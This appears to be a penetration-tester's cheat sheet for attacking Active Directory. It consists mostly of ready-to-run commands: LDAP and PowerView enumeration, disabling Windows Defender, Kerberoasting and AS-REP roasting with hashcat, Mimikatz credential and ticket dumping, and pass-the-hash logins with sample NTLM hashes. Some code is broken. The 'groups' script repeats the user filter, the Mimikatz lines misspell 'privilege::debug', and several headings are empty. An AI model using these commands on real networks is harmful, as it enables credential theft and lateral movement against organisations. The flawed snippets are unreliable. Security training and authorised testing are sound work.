Manually Enumeration
Basic enumeration
Use built-in net.exe application
Who are you
Enumerate all users
Enumerate all groups
Use powershell script
Enumerate all users
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| $domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="samAccountType=805306368"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
Foreach($prop in $obj.Properties)
{
$prop
}
Write-Host "------------------------"
}
|
Enumerate all groups
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| $domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="samAccountType=805306368"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
Foreach($prop in $obj.Properties)
{
$prop
}
Write-Host "------------------------"
}
|
Service account enumeration (Though SPNs)
When SQL, IIS or other services are integrated into Active Directory, Service Principal Name (SPN) will associate these service to a service account in Active Directory. By enumerating all registered SPNs in the domain, we can obtain infomation about applications running on servers integrated with the the Active Directory.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| $domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="serviceprincipalname=*http*"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
Foreach($prop in $obj.Properties)
{
$prop
}
}
|
PowerView
Load powershell module
For disable virus protection
1
| Set-MpPreference -DisableRealtimeMonitoring $true
|
Domain
Domain Policy
Domain Controller
Domain Users
List all users
1
2
| Get-DomainUser
Get-DomainUser -SPN # Enumerate account service
|
Detail of a specific user
1
| Get-DomainUser -Identity <username>
|
User logged on a machine
1
| Get-NetLoggedon -ComputerName <computer-name>
|
List of computers in the current domain
1
| Get-NetComputer| select name, operatingsystem
|
Groups
List all groups in the current domain
Detail a specific group
1
| Get-NetGroup 'Domain Admins'
|
List all groups in local
1
| Get-NetLocalGroup | Select-Object GroupName
|
List members of the domain admin group
1
| Get-NetGroupMember -MemberName "domain admins" -Recurse | select MemberName
|
Shares
Find share on hosts
1
| Invoke-ShareFinder -Verbose
|
List network shares
Find all domain shares
1
2
| Find-DomainShare
Find-DomainShare -CheckShareAccess # Find shares with read access
|
Obtains the file server used by the current domain according to the SPN
1
| Get-NetFileServer -Verbose
|
Group Policies
Service account attacks
Kerberoasting attack
The service ticket is encrypted through the password hash of the SPN. So, We can request a service ticket from DC, extract and attemp to crack the password of the service account.
Find all users with an SPN set (likely service accounts)
The Invoke-Kerberoast.ps1 script extends this attack, and can automatically enumerate all service principal names in the domain, request service tickets for them, and export them in a format ready for cracking in both John the Ripper and Hashcat, completely eliminating the need for Mimikatz in this attack.
1
| Import-Module C:\Windows\Temp\Invoke-Kerberoast.ps1
|
1
| Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast
|
1
| hashcat -m 13100 --force -a 0 hashes.kerberoast rockyou
|
ASREPRoasting
ASReproasting occurs when a user account has the privilege “Does not require Pre-Authentication” set. This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account.
If don’t have any domain username, let’s enumerate
1
| ./kerbrute userenum --dc spookysec.local -d spookysec.local userlist.txt
|
Then, use GetNPUsers to request ticket
1
| impacket-GetNPUsers domain.local/svc-admin -no-pass
|
Then, crack the hash
1
| hashcat -m 18200 -a 0 hash.kerberos passwordlist.txt
|
Lateral movement
Mimikatz - Cached Credential
Dump the credentials of all logged-on users:
1
| mimikatz.exe "priviledge::debug" "sekurlsa::logonpasswords" exit
|
Dump Kerberos TGT and service tickets:
1
| mimikatz.exe "priviledge::debug" "sekurlsa::tickets" exit
|
Pass the hash
Allows an attacker to authenticate to a remote system or service using a user’s NTLM hash instead of the associated plaintext password
1
| pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //10.11.0.22 cmd
|
1
| psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e Administrator@10.0.0.4
|
1
| mimikatz.exe "priviledge::debug" "sekurlsa::pth /user:jeff /domain:doamin /ntlm:d4ad8b9f8ccb87f6d02d7388157ae" exit
|
